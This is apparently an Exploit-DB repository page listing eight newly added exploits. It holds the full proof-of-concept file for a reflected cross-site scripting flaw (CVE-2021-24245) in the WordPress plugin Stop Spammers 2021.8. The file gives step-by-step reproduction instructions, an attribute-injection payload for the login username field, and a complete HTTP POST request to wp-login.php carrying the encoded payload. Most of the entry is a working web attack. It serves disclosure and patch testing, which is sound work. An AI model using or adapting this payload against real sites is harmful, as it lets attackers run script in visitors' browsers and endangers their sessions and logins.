2f8f6dffbd
8 changes to exploits/shellcodes WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) Visual Studio Code 1.47.1 - Denial of Service (PoC) WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS) In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection ManageEngine ADSelfService Plus 6.1 - CSV Injection COVID19 Testing Management System 1.0 - SQL Injection (Auth Bypass) COVID19 Testing Management System 1.0 - 'Admin name' Cross-Site Scripting (XSS)
36 lines
No EOL
1.3 KiB
Text
36 lines
No EOL
1.3 KiB
Text
# Exploit Title: WordPress Plugin Stop Spammers 2021.8 - 'log' Reflected Cross-site Scripting (XSS)
|
|
# Date: 04/08/2021
|
|
# Exploit Author: Hosein Vita
|
|
# Vendor Homepage: https://wordpress.org/plugins/stop-spammer-registrations-plugin/
|
|
# Software Link: https://downloads.wordpress.org/plugin/stop-spammer-registrations-plugin.zip
|
|
# Version: <= 2021.8
|
|
# Tested on: Windows-Ubuntu
|
|
# CVE : CVE-2021-24245
|
|
|
|
Summary:
|
|
|
|
Reflected cross-site scripting (XSS) vulnerabilities in 'Stop Spammers <= 2021.8' allow remote attackers to run arbitary javascript
|
|
|
|
Proof of concepts:
|
|
|
|
1-Install "Stop Spammers <= 2021.8" in your wordpress website
|
|
2-For testing remove your IP address from the allowed list
|
|
3-Go to http://<YOUR-WEBSITE>/wp-admin
|
|
4-In username field enter this payload ~> ad" accesskey=X onclick=alert(1) "
|
|
#Notice the `ad` keyword must be in your payload!
|
|
5-Press Alt + Shift + X to trigger Xss
|
|
#Tested on Firefox
|
|
|
|
Request POC:
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: localhost
|
|
Connection: close
|
|
Content-Length: 161
|
|
Upgrade-Insecure-Requests: 1
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: wordpress_test_cookie=WP+Cookie+check;
|
|
|
|
log=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1 |